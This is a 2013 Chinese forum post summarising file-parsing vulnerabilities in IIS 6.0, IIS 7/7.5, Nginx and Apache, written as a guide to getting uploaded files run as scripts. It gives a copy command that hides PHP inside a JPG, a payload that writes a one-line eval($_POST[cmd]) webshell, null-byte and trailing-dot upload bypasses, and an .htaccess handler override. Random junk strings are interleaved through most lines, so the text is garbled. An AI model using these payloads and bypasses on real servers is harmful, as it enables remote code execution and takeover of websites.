找回密码
 立即注册
查看: 3227|回复: 0
打印 上一主题 下一主题

常见服务器解析漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:14:09 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Author : laterain+ F7 j9 F  K: `* J& G" u, e
[+]IIS6.0( M3 S) @$ {. d& D" J0 U

9 J5 n/ T1 ?: F目录解析:/xx.asp/xx.jpg
- t# u# G9 _/ C  r" K xx.jpg 可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码
$ {! f) p, m- r9 z! ^( W2 Q IIS6.0 会将 xx.jpg 解析为 asp 文件。* A; Q" j: ]- {" r2 F
后缀解析:/xx.asp;.jpg     9 W; G& r. J; f9 j, F% x
IIS6.0 都会把此类后缀文件成功解析为 asp 文件。
; y9 H) k; [  T* e& q" S默认解析:/xx.asa
+ m) c. r4 o, Y" N' `: v         /xx.cer
; v& ?" e5 C6 \/ {2 A         /xx.cdx& H) R$ v$ O7 @$ |/ W
IIS6.0 默认的可执行文件除了 asp 还包含这三种
  r2 t5 s/ a1 M- n- U8 o 此处可联系利用目录解析漏洞 2 c  F/ G. H+ K7 ^1 ?% O7 h
/xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg8 h+ q3 |5 x1 v- N) k
[+]IIS 7.0/IIS 7.5/Nginx <0.8.038 X& u" t3 W3 H9 e) y

% `& R  I% E1 |' C) G( Y: c6 Z0 i% y IIS 7.0/IIS 7.5/Nginx <0.8.03$ j; g7 L, {1 C# R  K, h# j, U1 r
在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面
" L- e/ g# a% s6 ^; F 加上/xx.php,会将 /xx.jpg/xx.php 解析为 php 文件。; f7 H# S0 p+ Y. i+ d8 F5 o
常用利用方法:
, Y$ h( I/ C, Q+ c 将一张图和一个写入后门代码的文本文件合并将恶意文本
7 D+ @; A- @* H 写入图片的二进制代码之后,避免破坏图片文件头和尾
) [: n, P1 J  r7 J# P 如:: x( V. E) c8 L. s5 G
copy xx.jpg /b + yy.txt/a xy.jpg
* ]9 U9 }; d$ p# Z% X" g #########################################################6 @6 D7 T/ g) y7 l4 O  X  B; m
/b 即二进制[binary]模式/ x+ z9 Y- h; H% U
/a 即ascii模式
! Z* Z: X- ^8 E; A' e xx.jpg 正常图片文件) B! {' E1 Z. b. G* W" x: s
yy.txt 内容 <?PHP fputs(fopen('shell.php','w'),
% q- n6 Q* @7 g2 m/ c '<?php eval($_POST[cmd])?>');?>
9 r4 W0 M* v  t8 X7 ~( t7 V 意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称: r$ z" |* }9 Y8 {) f3 l, m
为shell.php的文件; y4 l7 I3 A/ s' A% g$ L
###########################################################
5 B0 ^( k; k) G5 F5 E5 d5 x4 ~ 找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php
% O8 u+ x2 b! F) F8 K& s: F; v2 i 即可执行恶意文本。然后就在图片目录下生成一句话木马 shell.php
$ d+ T. a/ Q! S! L% s9 b1 ] 密码 cmd' k/ S  F9 u, I! s: |
[+]Nginx <0.8.03
: a% N$ [/ [% u7 C/ Q4 ?! _  j. [5 f + i0 Y4 `# `. W5 d8 a6 Q/ o
在Fast-CGI关闭的情况下,Nginx <0.8.03依然存在解析漏洞
+ l6 m, Q2 @3 i* {" V% ~& x 在一个文件路径(/xx.jpg)后面加上%00.php
1 Z. |  d! Z2 Y( S+ U 会将 /xx.jpg%00.php 解析为 php 文件。4 C' m6 j6 S! J5 Y
[+]Apache<0.8.03, [: l" h- a5 ^8 o& E) v1 n3 U
& B, V6 J7 g: q8 L/ M+ q5 T' U
后缀解析:test.php.x1.x2.x3
  {" k2 B" Y+ ^! O Apache将从右至左开始判断后缀,若x3非可识别后缀,
% R& G  V2 |% D) u, X& B 再判断x2,直到找到可识别后缀为止,然后将该可识别
- x. v" k6 K" H 后缀进解析test.php.x1.x2.x3 则会被解析为php% p8 U2 T$ @' x" d
经验之谈:php|php3|phtml 多可被Apache解析。0 Z  i  h: Y3 v7 m8 ~$ W7 |
[+]其他一些可利用的
9 `5 U* @$ s/ Z& k/ j+ K6 E& Q9 b1 O
) Y; L8 l0 x, X6 x$ [5 ~3 b- ?在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的
2 J( S, Q9 ]" p2 Q0 k: Z若这样命名,windows会默认除去空格或点,这也是可以被利用的!/ z" |* U. G4 k$ _; \2 V) X+ d3 r6 ]
在向一台windows主机上传数据时,你可以抓包修改文件名,在后面加个空格. t' T$ S" x5 x2 L5 g4 M8 U: Z
或点,试图绕过黑名单,若上传成功,最后的点或空格都会被消除,这样就可: o! j! N. I9 I- q
得到shell。我记得Fck Php 2.6就存在加空格绕过的漏洞。
+ C# @' R: \0 N! x. z8 T( ]  O; A& r{Linux主机中不行,Linux允许这类文件存在}9 y! m6 ]) k% J. L" f3 _2 K( X
如果在Apache中.htaccess可被执行(默认不执行,这是90sec里的一位朋友说' `9 o8 @: E) z  k4 u: D
的,当初我并不知道),且可以被上传,那可以尝试在, C2 R7 X+ F% ~: k" S
.htaccess中写入:
" X- u2 F6 c: d# p<FilesMatch “shell.jpg”> ( ?- N7 U2 _# X* b; t
SetHandler application/x-httpd-php ; c1 g( W* S) J/ \; n4 }0 E! Q
</FilesMatch>0 j* t2 Z) x. c3 E3 Q% e7 Q
shell.jpg换成你上传的文件,这样shell.jpg就可解析为php文件1 ]6 V& R& |6 q" s
[+]错误修改7 d; k7 ~: c8 y) J8 |
* e4 l& P' X! T" m/ R8 Q" F
在 IIS 6.0 下可解析 /xx.asp:.jpg
4 |7 w% K5 t* m( a4 y) m{/xx.asp:.jpg 此类文件在Windows下不允许存在,:.jpg被自动除去1 J  N. J) n* I$ @7 C) I  k
剩下/xx.asp}修改:
7 J/ \- `) w" g& A+ |! Z$ k, M8 m先谢谢核攻击的提醒
' A5 p8 t: g, a! j当上传一个/xx.asp:.jpg文件时,的确:.jpg会消失,但是现在的/xx.asp
$ q/ ^  v3 {/ i  d% B里是没有任何内容的,因为。。不好解释 大家自己看" \7 e# v1 W& N9 E$ J, @
http://lcx.cc/?i=2448
" F7 ]# g6 b; f- xhttp://baike.baidu.com/view/3619593.htm
7 l) D5 B4 x3 c3 {" ^% v+ C
3 Q7 z) ]: {# ]% \4 ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表